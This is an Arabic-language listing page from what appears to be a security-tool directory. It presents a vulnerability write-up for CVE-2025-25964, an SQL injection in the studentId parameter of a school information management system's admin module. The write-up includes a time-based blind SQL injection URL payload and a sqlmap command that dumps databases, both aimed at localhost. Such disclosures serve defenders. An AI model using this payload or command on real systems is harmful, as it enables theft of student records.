Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sudo-sakib/cve-2025-25964
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليمأمن قواعد البيانات
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

ثغرة حقن SQL حرجة (CVE-2025-25964) تم اكتشافها في School Information Management System v1.0

عرض المستودع
2211منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-25964: حقن SQL في نظام إدارة معلومات المدرسة الإصدار 1.0

مقدمة

في المشهد الرقمي اليوم، يظل حقن SQL (SQLi) أحد أكثر الثغرات الأمنية شيوعًا وخطورة الموجودة في تطبيقات الويب. تناقش هذه التدوينة ثغرة حقن SQL حرجة (CVE-2025-25964) تم اكتشافها في نظام إدارة معلومات المدرسة الإصدار 1.0، المطوَّر من قبل Itsourcecode. تسمح هذه الثغرة للمهاجمين عن بُعد باستغلال النظام، مما قد يؤدي إلى كشف معلومات حساسة.

نظرة عامة على الثغرة

معرف CVE: CVE-2025-25964

نوع الثغرة: حقن SQL (SQLi)

المنتج المتأثر: نظام إدارة معلومات الطلاب - الإصدار 1.0

المكوّن المتأثر: معامل studentId في /columbans/admin/modules/student/index.php

نوع الهجوم: عن بُعد

الخطورة: عالية

المكتشف: Sakib Shaikh

خطوات إعادة الإنتاج

لإثبات التأثير، اتبع هذه التعليمات خطوة بخطوة:

  1. إعداد التطبيق الضعيف: قم بتثبيت وتهيئة نظام إدارة معلومات المدرسة الإصدار 1.0 على خادم محلي.

  2. تسجيل الدخول: قم بتسجيل الدخول باستخدام بيانات الاعتماد المقدمة من Itsourecode.

  3. الوصول إلى نقطة النهاية الضعيفة:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. حقن حمولة SQL لاختبار حقن SQL:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. لاحظ استجابة التطبيق: إذا استغرق تحميل الصفحة 10 ثوانٍ أو أكثر، فهذا يؤكد وجود ثغرة حقن SQL. وهذا يثبت أن قاعدة البيانات الخلفية تنفذ استعلام SQL المحقون.

  2. استخدم SQLMap للاستغلال الآلي:

python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

يحاول هذا الأمر استخراج أسماء قواعد البيانات والجداول والمعلومات الحساسة من النظام.

تحليل السبب الجذري

تنشأ المشكلة بسبب عدم تعقيم المدخلات بشكل صحيح في معامل studentId في ملف index.php. عندما يقوم المهاجم بتعديل معامل studentId بحمولات SQL خبيثة، تعالج التطبيق المدخلات دون تحقق مناسب، مما يؤدي إلى حقن SQL.

المراجع

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

تنزيل الأداة